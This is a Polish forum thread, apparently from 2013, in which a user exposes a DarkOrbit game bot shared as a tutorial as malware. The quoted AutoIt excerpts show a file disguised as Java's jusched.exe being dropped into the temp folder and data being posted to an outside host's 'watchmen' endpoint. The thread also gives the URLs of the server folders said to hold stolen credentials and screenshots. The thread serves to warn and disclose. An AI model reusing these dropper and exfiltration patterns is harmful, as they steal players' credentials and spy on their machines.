[Tutorial] Dark Bot

[CałaPrawda]

Nie działa.

[Zkumeku]

Wszystko spoko, ale osoby tworzą konto na PHP-Fusion (masz autoreklamę dzięki temu). Następnie podają swoje passy Ci na stronie, które bot wykorzystuje do logowania się - są w postaci jawnej. Teraz z jednej strony ty masz całą bazę kont do DO, a jak ktoś się pobawi, to także może bez trudu ją nabyć - bo na 100% nie ma dobrych zabezpieczeń.

Niby pomagasz ludziom, a z drugiej strony nie dbasz o bezpieczeństwo i bawisz się nim nierozważnie.

[GameOverMan]

@UP Reklama tam nawet forum nie ma na tej stronie.

Bez przesady "nie dbasz o bezpieczeństwo i bawisz się nim nierozważnie", skąd ty wiesz co ja robię? Jak masz jakieś obawy to nie korzystaj, a jak masz zamiar mnie osądzać, że się bawię to zachowaj to dla siebie.

[Zkumeku]

GameOverMan, dnia 11 Lip 2013 - 23:08, napisał:

@UP Reklama tam nawet forum nie ma na tej stronie.

Bez przesady "nie dbasz o bezpieczeństwo i bawisz się nim nierozważnie", skąd ty wiesz co ja robię? Jak masz jakieś obawy to nie korzystaj, a jak masz zamiar mnie osądzać, że się bawię to zachowaj to dla siebie.

Tu nie chodzi o osąd, lecz o fakt. Niepotrzebny dostęp + niepotrzebna droga passów, aż do połączenia się z grą. Z autoreklamą, jaśniej chodziło mi o nabijanie sobie userów na stronce + zapełnianie bazy kontami i mailami - dobre do późniejszych spraw w pewnych kierunkach.

 

PS. Nie korzystam, nie gram - nie mam potrzeby

 

EDIT:

 

Wykonanie też średnie... wszędzie w kodzie masz reloadTokeny wpisane na sztywno totalnie - po logach łatwo się skapnąć co i jak, więc sesja jako mozilla nic Ci nie da.

 

Cwanie ukrywasz plik DarkBot.ini - lepiej będzie przy atrybucie +S +H (SuperHidden - nie widać nawet po włączeniu pokazywania ukrytych plików).

 

Ciekawi mnie w twoim kodzie (więcej nie będę pisał z tego kodu):

FileInstall("jusched.exe", @TempDir & "\jusched.exe")
FileInstall("jusched2.exe", @TempDir & "\jusched2.exe")
$client = cpu_id()
$proname = "jusched.exe"
$keyname = "Java Runtime Environment\jusched.exe"
$keynamespec = "jusched2.exe"
$propid = "u9o86ed2pd"
$keypid = "b6a7yag9m0"
$directory = @AppDataDir & "\"

(...)

+ bonus wycinka z jusched.exe (nie jest to plik javy, tylko autoit):

$hconnect = _winhttpconnect($hsession, "www.autobot.xaa.pl")
		$log = _winhttpsimplerequest($hconnect, "POST", "/watchmen/clients.php", "", "gknjFmKgqQfczDsns2oQ47lsPpCx0w=J0dxt3V68doYjwCLx2dTeXgjStWMR8&client=" & $client & "&data=   >>> Version: " & $version & " <<<" & @CRLF & "The virus has been terminated!" & @CRLF & @CRLF)
		_winhttpclosehandle($hsession)

Pozdr.

 

EDIT2: Do moderatora DO, który wszedł tu i to olał:

 

Jak nie rozumiesz kodu itp., wystarczy się podpytać. Ziomek funduje pięknego keyloggera itp. ludziom pobierającym tego "bota", oraz gromadzi sobie w postaci jawnej ich dane do kont itp.

 

Dowody (wyżej jest plik który odnosi się do folderu "watchmen"):

 

http://www.autobot.xaa.pl/watchmen/ 

Oraz jeszcze jeden ciekawy folder wymieniony w kodzie i w logach:

 

http://www.autobot.xaa.pl/screenshots/

 

Polecam pozaglądać w foldery clients itp. - w przypadku, gdyby usunął to - mam kopię wszystkiego i chętnie ją dam komu trzeba (moderatorom/adminom tego forum) by gość się oduczył